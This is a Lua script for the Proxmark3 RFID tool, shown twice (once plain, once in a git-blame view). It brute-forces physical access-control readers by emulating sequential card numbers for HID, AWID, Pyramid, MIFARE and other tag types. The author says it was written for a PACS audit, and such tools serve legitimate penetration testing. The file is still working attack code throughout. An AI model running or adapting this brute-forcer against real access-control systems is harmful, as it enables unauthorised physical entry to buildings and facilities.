[proxmark3-svn] / client / scripts / brutesim.lua

desc = [[\r
\r
  .-----------------------------------------------------------------.\r
 /  .-.                                                         .-.  \\r
|  /   \                    BruteSim                           /   \  |\r
| |\_.  |     (bruteforce simulation for multiple tags)       |    /| |\r
|\|  | /|                      by                             |\  | |/|\r
| `---' |                 Kenzy Carey                         | `---' |\r
|       |                                                     |       |\r
|       |-----------------------------------------------------|       |\r
\       |                                                     |       /\r
 \     /                                                       \     /\r
  `---'                                                         `---'\r
]]\r
author = [[ Kenzy Carey ]]\r
usage = [[\r
\r
USAGE:\r
script run brutesim -r rfid_tag -f facility_code -b base_card_number -c count -t timeout -d direction\r
option		argument		description\r
------		--------		-----------\r
-r      	*see below		RFID Tag: the RFID tag to emulate\r
-f		0-999			Facility Code: The facility code (dfx: country id, 14a: type)\r
-b		0-65535			Base Card Number: base card number to start from\r
-c		1-65536			Count: number of cards to try\r
-t		.0-99999, pause		Timeout: timeout between cards (use the word 'pause' to wait for user input)\r
-d		up, down		Direction: direction to move through card numbers\r
-h					Show this\r
\r
*SUPPORTED TAGS: pyramid, awid, fdx, jablotron, noralsy, presco, visa2000, 14a, hid\r
\r
EXAMPLE: \r
script run brutesim -r pyramid -f 10 -b 1000 -c 10 -t 1 -d down\r
(the above example would bruteforce pyramid tags, starting at 10:1000, ending at 10:991, and waiting 1 second between each card)\r
]]\r
\r
-- I wrote this as i was doing a PACS audit. This is far from complete, but is easily expandable.\r
-- The idea was based on proxbrute, but i needed more options, and support for different readers.\r
-- I dont know LUA, so I used Brian Redbeards lf_bulk_program.lua script as a starting point, sorry if its kludgy.\r
	\r
getopt = require('getopt')							-- Used to get get command line arguments\r
bit32 = require('bit32')							-- Used to convert FC/CN to hex\r
\r
local function isempty(s)							-- Check if a string is empty\r
	return s == nil or s == ''\r
end\r
\r
local function main(args)\r
\r
	print("")								-- Print a blank line to make things look cleaner\r
\r
	for o, a in getopt.getopt(args, 'r:f:b:c:t:d:h') do			-- Populate command like arguments\r
		if o == 'r' then rfidtag = a end\r
		if o == 'f' then facility = a end\r
		if o == 'b' then baseid = a end\r
		if o == 'c' then count = a end\r
		if o == 't' then timeout = a end\r
		if o == 'd' then direction = a end\r
		if o == 'h' then return print(usage) end\r
	end\r
\r
	if isempty(rfidtag) then 						-- Check to see if -r argument was passed \r
		print("You must supply the flag -r (rfid tag)")\r
		print(usage)\r
		return\r
	end\r
										-- Check what RFID Tag we are using\r
	if rfidtag == 'pyramid' then						-- For eaach RFID Tag:\r
		consolecommand = 'lf pyramid sim'				-- Set the console command\r
		rfidtagname = 'Farpointe/Pyramid'				-- Set the display name\r
		facilityrequired = 1						-- Set if FC is required\r
	elseif rfidtag == 'awid' then\r
		consolecommand = 'lf awid sim'\r
		rfidtagname = 'AWID'\r
		facilityrequired = 1\r
	elseif rfidtag == 'fdx' then						-- I'm not sure why you would need to bruteforce this ¯\_(ツ)_/¯ \r
		consolecommand = 'lf fdx sim'\r
		rfidtagname = 'FDX-B'\r
		facilityrequired = 1\r
	elseif rfidtag == 'jablotron' then\r
		consolecommand = 'lf jablotron sim'\r
		rfidtagname = 'Jablotron'\r
		facilityrequired = 0\r
	elseif rfidtag == 'noralsy' then\r
		consolecommand = 'lf noralsy sim'\r
		rfidtagname = 'Noralsy'\r
		facilityrequired = 0\r
	elseif rfidtag == 'presco' then\r
		consolecommand = 'lf presco sim d'\r
		rfidtagname = 'Presco'\r
		facilityrequired = 0\r
	elseif rfidtag == 'visa2000' then\r
		consolecommand = 'lf visa2000 sim'\r
		rfidtagname = 'Visa2000'\r
		facilityrequired = 0\r
	elseif rfidtag == '14a' then\r
		consolecommand = 'hf 14a sim'\r
		if facility == "1" then rfidtagname = 'MIFARE Classic'		-- Here we use the -f option to read the 14a type instead of the facility code\r
		elseif facility == "2" then rfidtagname = 'MIFARE Ultralight'\r
		elseif facility == "3" then rfidtagname = 'MIFARE Desfire'\r
		elseif facility == "4" then rfidtagname = 'ISO/IEC 14443-4'\r
		elseif facility == "5" then rfidtagname = 'MIFARE Tnp3xxx'\r
		else \r
			print("Invalid 14a type (-f) supplied. Must be 1-5")\r
			print(usage)\r
			return\r
		end\r
		facilityrequired = 0						-- Disable the FC required check, as we used it for type instead of FC\r
	elseif rfidtag == 'hid' then\r
		consolecommand = 'lf hid sim'\r
		rfidtagname = 'HID'\r
		facilityrequired = 1\r
	else									-- Display error and exit out if bad RFID tag was supplied\r
		print("Invalid rfid tag (-r) supplied")\r
		print(usage)\r
		return\r
	end\r
	\r
	if isempty(baseid) then 						-- Display error and exit out if no starting id is set\r
		print("You must supply the flag -b (base id)")\r
		print(usage)\r
		return\r
	end\r
\r
	if isempty(count) then 							-- Display error and exit out of no count is set\r
		print("You must supply the flag -c (count)")\r
		print(usage)\r
		return\r
	end\r
	\r
	if facilityrequired == 1 then						-- If FC is required\r
		facilitymessage = " - Facility Code: "				-- Add FC to status message\r
		if isempty(facility) then 					-- If FC was left blank, display warning and set FC to 0 \r
			print("Using 0 for the facility code as -f was not supplied")\r
			facility = 0 						\r
		end\r
	else									-- If FC is not required\r
		facility = ""							-- Clear FC\r
		facilitymessage = ""						-- Remove FC from status message\r
	end\r
	\r
	if isempty(timeout) then 						-- If timeout was not supplied, show warning and set timeout to 0\r
		print("Using 0 for the timeout as -t was not supplied")\r
		timeout = 0 \r
	end\r
	\r
	if isempty(direction) then 						-- If direction was not supplied, show warning and set direction to down\r
		print("Using down for direction as -d was not supplied")\r
		direction = 'down' \r
	end\r
	\r
	if tonumber(count) < 1 then\r
		print("Count -c must be set to 1 or higher")\r
		return\r
	else\r
		count = count -1 						-- Make our count accurate by removing 1, because math\r
	end							\r
	\r
	if direction == 'down' then 						-- If counting down, set up our for loop to count down\r
		endid = baseid - count\r
		fordirection = -1\r
	elseif direction == 'up' then						-- If counting up, set our for loop to count up\r
		endid = baseid + count\r
		fordirection = 1\r
	else									-- If invalid direction was set, show warning and set up our for loop to count down\r
		print("Invalid direction (-d) supplied, using down")\r
		endid = baseid - count\r
		fordirection = -1\r
	end\r
	\r
										-- The code below was blatantly stolen from Brian Redbeard's lf_bulk_program.lua script		\r
	function toBits(num,bits)\r
		bits = bits or math.max(1, select(2, math.frexp(num)))\r
		local t = {}\r
		for b = bits, 1, -1 do\r
			t[b] = math.fmod(num, 2)\r
			num = math.floor((num - t[b]) / 2)\r
		end\r
		return table.concat(t)\r
	end\r
\r
	local function evenparity(s)\r
		local _, count = string.gsub(s, "1", "")\r
		local p = count % 2\r
		if (p == 0) then\r
			return(false)\r
		else\r
			return(true)\r
		end\r
	end\r
	\r
	local function isempty(s)\r
		return s == nil or s == ''\r
	end\r
\r
	local function cardHex(i,f)\r
		fac = bit32.lshift(f,16)\r
		id = bit32.bor(i, fac)\r
		stream=toBits(id,26)\r
		high = evenparity(string.sub(stream,0,12)) and 1 or 0\r
		low = not evenparity(string.sub(stream,13)) and 1 or 0\r
		bits = bit32.bor(bit32.lshift(id,1), low)\r
		bits = bit32.bor(bits, bit32.lshift(high,25))\r
		preamble = bit32.bor(0, bit32.lshift(1,5))\r
		bits = bit32.bor(bits, bit32.lshift(1,26))\r
		return ("%04x%08x"):format(preamble,bits)\r
	end\r
											-- End stolen code \r
	\r
	\r
	print("")									-- Display status message\r
	print("BruteForcing "..rfidtagname..""..facilitymessage..""..facility.." - CardNumber Start: "..baseid.." - CardNumber End: "..endid.." - TimeOut: "..timeout)\r
	print("")\r
	for cardnum = baseid,endid,fordirection do 					-- Loop through for each count (-c)\r
		if rfidtag == 'hid' then cardnum = cardHex(cardnum, facility) end	-- If rfid tag is set to HID, convert card to HEX using the stolen code above \r
		core.console(consolecommand..' '..facility..' '..cardnum)		-- Send command to proxmark\r
		if timeout == 'pause' then						-- If timeout is set to pause, wait for user input\r
			print("Press enter to continue ...")\r
			io.read()\r
		else									-- Otherwise sleep for timeout duration\r
			os.execute("sleep "..timeout.."")\r
		end\r
	end\r
	core.console('hw ping')								-- Ping the proxmark to stop emulation and see if its still responding\r
	\r
end											-- Go bye bye\r
\r
\r
main(args)										-- Do the thing\r
Commit	Line	Data
dfa1628a KC	1	desc = [[\r
	2	\r
	3	.-----------------------------------------------------------------.\r
	4	/ .-. .-. \\r
	5	\| / \ BruteSim / \ \|\r
	6	\| \|\_. \| (bruteforce simulation for multiple tags) \| /\| \|\r
	7	\|\\| \| /\| by \|\ \| \|/\|\r
	8	\| `---' \| Kenzy Carey \| `---' \|\r
	9	\| \| \| \|\r
	10	\| \|-----------------------------------------------------\| \|\r
	11	\ \| \| /\r
	12	\ / \ /\r
	13	`---' `---'\r
	14	]]\r
	15	author = [[ Kenzy Carey ]]\r
	16	usage = [[\r
	17	\r
	18	USAGE:\r
	19	script run brutesim -r rfid_tag -f facility_code -b base_card_number -c count -t timeout -d direction\r
	20	option argument description\r
	21	------ -------- -----------\r
	22	-r *see below RFID Tag: the RFID tag to emulate\r
	23	-f 0-999 Facility Code: The facility code (dfx: country id, 14a: type)\r
	24	-b 0-65535 Base Card Number: base card number to start from\r
	25	-c 1-65536 Count: number of cards to try\r
	26	-t .0-99999, pause Timeout: timeout between cards (use the word 'pause' to wait for user input)\r
	27	-d up, down Direction: direction to move through card numbers\r
	28	-h Show this\r
	29	\r
	30	*SUPPORTED TAGS: pyramid, awid, fdx, jablotron, noralsy, presco, visa2000, 14a, hid\r
	31	\r
	32	EXAMPLE: \r
	33	script run brutesim -r pyramid -f 10 -b 1000 -c 10 -t 1 -d down\r
	34	(the above example would bruteforce pyramid tags, starting at 10:1000, ending at 10:991, and waiting 1 second between each card)\r
	35	]]\r
	36	\r
	37	-- I wrote this as i was doing a PACS audit. This is far from complete, but is easily expandable.\r
	38	-- The idea was based on proxbrute, but i needed more options, and support for different readers.\r
	39	-- I dont know LUA, so I used Brian Redbeards lf_bulk_program.lua script as a starting point, sorry if its kludgy.\r
	40	\r
	41	getopt = require('getopt') -- Used to get get command line arguments\r
	42	bit32 = require('bit32') -- Used to convert FC/CN to hex\r
	43	\r
	44	local function isempty(s) -- Check if a string is empty\r
	45	return s == nil or s == ''\r
	46	end\r
	47	\r
	48	local function main(args)\r
	49	\r
	50	print("") -- Print a blank line to make things look cleaner\r
	51	\r
	52	for o, a in getopt.getopt(args, 'r:f:b:c:t:d:h') do -- Populate command like arguments\r
	53	if o == 'r' then rfidtag = a end\r
	54	if o == 'f' then facility = a end\r
	55	if o == 'b' then baseid = a end\r
	56	if o == 'c' then count = a end\r
	57	if o == 't' then timeout = a end\r
	58	if o == 'd' then direction = a end\r
	59	if o == 'h' then return print(usage) end\r
	60	end\r
	61	\r
	62	if isempty(rfidtag) then -- Check to see if -r argument was passed \r
	63	print("You must supply the flag -r (rfid tag)")\r
	64	print(usage)\r
65	return\r
66	end\r
67	-- Check what RFID Tag we are using\r
68	if rfidtag == 'pyramid' then -- For eaach RFID Tag:\r
69	consolecommand = 'lf pyramid sim' -- Set the console command\r
70	rfidtagname = 'Farpointe/Pyramid' -- Set the display name\r
71	facilityrequired = 1 -- Set if FC is required\r
72	elseif rfidtag == 'awid' then\r
73	consolecommand = 'lf awid sim'\r
74	rfidtagname = 'AWID'\r
75	facilityrequired = 1\r
76	elseif rfidtag == 'fdx' then -- I'm not sure why you would need to bruteforce this ¯\_(ツ)_/¯ \r
77	consolecommand = 'lf fdx sim'\r
78	rfidtagname = 'FDX-B'\r
79	facilityrequired = 1\r
80	elseif rfidtag == 'jablotron' then\r
81	consolecommand = 'lf jablotron sim'\r
82	rfidtagname = 'Jablotron'\r
83	facilityrequired = 0\r
84	elseif rfidtag == 'noralsy' then\r
85	consolecommand = 'lf noralsy sim'\r
86	rfidtagname = 'Noralsy'\r
87	facilityrequired = 0\r
88	elseif rfidtag == 'presco' then\r
89	consolecommand = 'lf presco sim d'\r
90	rfidtagname = 'Presco'\r
91	facilityrequired = 0\r
92	elseif rfidtag == 'visa2000' then\r
93	consolecommand = 'lf visa2000 sim'\r
94	rfidtagname = 'Visa2000'\r
95	facilityrequired = 0\r
96	elseif rfidtag == '14a' then\r
97	consolecommand = 'hf 14a sim'\r
98	if facility == "1" then rfidtagname = 'MIFARE Classic' -- Here we use the -f option to read the 14a type instead of the facility code\r
99	elseif facility == "2" then rfidtagname = 'MIFARE Ultralight'\r
100	elseif facility == "3" then rfidtagname = 'MIFARE Desfire'\r
101	elseif facility == "4" then rfidtagname = 'ISO/IEC 14443-4'\r
102	elseif facility == "5" then rfidtagname = 'MIFARE Tnp3xxx'\r
103	else \r
104	print("Invalid 14a type (-f) supplied. Must be 1-5")\r
105	print(usage)\r
106	return\r
107	end\r
108	facilityrequired = 0 -- Disable the FC required check, as we used it for type instead of FC\r
109	elseif rfidtag == 'hid' then\r
110	consolecommand = 'lf hid sim'\r
111	rfidtagname = 'HID'\r
112	facilityrequired = 1\r
113	else -- Display error and exit out if bad RFID tag was supplied\r
114	print("Invalid rfid tag (-r) supplied")\r
115	print(usage)\r
116	return\r
117	end\r
118	\r
119	if isempty(baseid) then -- Display error and exit out if no starting id is set\r
120	print("You must supply the flag -b (base id)")\r
121	print(usage)\r
122	return\r
123	end\r
124	\r
125	if isempty(count) then -- Display error and exit out of no count is set\r
126	print("You must supply the flag -c (count)")\r
127	print(usage)\r
128	return\r
129	end\r
130	\r
131	if facilityrequired == 1 then -- If FC is required\r
132	facilitymessage = " - Facility Code: " -- Add FC to status message\r
133	if isempty(facility) then -- If FC was left blank, display warning and set FC to 0 \r
134	print("Using 0 for the facility code as -f was not supplied")\r
135	facility = 0 \r
136	end\r
137	else -- If FC is not required\r
138	facility = "" -- Clear FC\r
139	facilitymessage = "" -- Remove FC from status message\r
140	end\r
141	\r
142	if isempty(timeout) then -- If timeout was not supplied, show warning and set timeout to 0\r
143	print("Using 0 for the timeout as -t was not supplied")\r
144	timeout = 0 \r
145	end\r
146	\r
147	if isempty(direction) then -- If direction was not supplied, show warning and set direction to down\r
148	print("Using down for direction as -d was not supplied")\r
149	direction = 'down' \r
150	end\r
151	\r
152	if tonumber(count) < 1 then\r
153	print("Count -c must be set to 1 or higher")\r
154	return\r
155	else\r
156	count = count -1 -- Make our count accurate by removing 1, because math\r
157	end \r
158	\r
159	if direction == 'down' then -- If counting down, set up our for loop to count down\r
160	endid = baseid - count\r
161	fordirection = -1\r
162	elseif direction == 'up' then -- If counting up, set our for loop to count up\r
163	endid = baseid + count\r
164	fordirection = 1\r
165	else -- If invalid direction was set, show warning and set up our for loop to count down\r
166	print("Invalid direction (-d) supplied, using down")\r
167	endid = baseid - count\r
168	fordirection = -1\r
169	end\r
170	\r
171	-- The code below was blatantly stolen from Brian Redbeard's lf_bulk_program.lua script \r
172	function toBits(num,bits)\r
173	bits = bits or math.max(1, select(2, math.frexp(num)))\r
174	local t = {}\r
175	for b = bits, 1, -1 do\r
176	t[b] = math.fmod(num, 2)\r
177	num = math.floor((num - t[b]) / 2)\r
178	end\r
179	return table.concat(t)\r
180	end\r
181	\r
182	local function evenparity(s)\r
183	local _, count = string.gsub(s, "1", "")\r
184	local p = count % 2\r
185	if (p == 0) then\r
186	return(false)\r
187	else\r
188	return(true)\r
189	end\r
190	end\r
191	\r
192	local function isempty(s)\r
193	return s == nil or s == ''\r
194	end\r
195	\r
196	local function cardHex(i,f)\r
197	fac = bit32.lshift(f,16)\r
198	id = bit32.bor(i, fac)\r
199	stream=toBits(id,26)\r
200	high = evenparity(string.sub(stream,0,12)) and 1 or 0\r
201	low = not evenparity(string.sub(stream,13)) and 1 or 0\r
202	bits = bit32.bor(bit32.lshift(id,1), low)\r
203	bits = bit32.bor(bits, bit32.lshift(high,25))\r
204	preamble = bit32.bor(0, bit32.lshift(1,5))\r
205	bits = bit32.bor(bits, bit32.lshift(1,26))\r
206	return ("%04x%08x"):format(preamble,bits)\r
207	end\r
208	-- End stolen code \r
209	\r
210	\r
211	print("") -- Display status message\r
212	print("BruteForcing "..rfidtagname..""..facilitymessage..""..facility.." - CardNumber Start: "..baseid.." - CardNumber End: "..endid.." - TimeOut: "..timeout)\r
213	print("")\r
214	for cardnum = baseid,endid,fordirection do -- Loop through for each count (-c)\r
215	if rfidtag == 'hid' then cardnum = cardHex(cardnum, facility) end -- If rfid tag is set to HID, convert card to HEX using the stolen code above \r
216	core.console(consolecommand..' '..facility..' '..cardnum) -- Send command to proxmark\r
217	if timeout == 'pause' then -- If timeout is set to pause, wait for user input\r
218	print("Press enter to continue ...")\r
219	io.read()\r
220	else -- Otherwise sleep for timeout duration\r
221	os.execute("sleep "..timeout.."")\r
222	end\r
223	end\r
224	core.console('hw ping') -- Ping the proxmark to stop emulation and see if its still responding\r
225	\r
226	end -- Go bye bye\r
227	\r
228	\r
229	main(args) -- Do the thing\r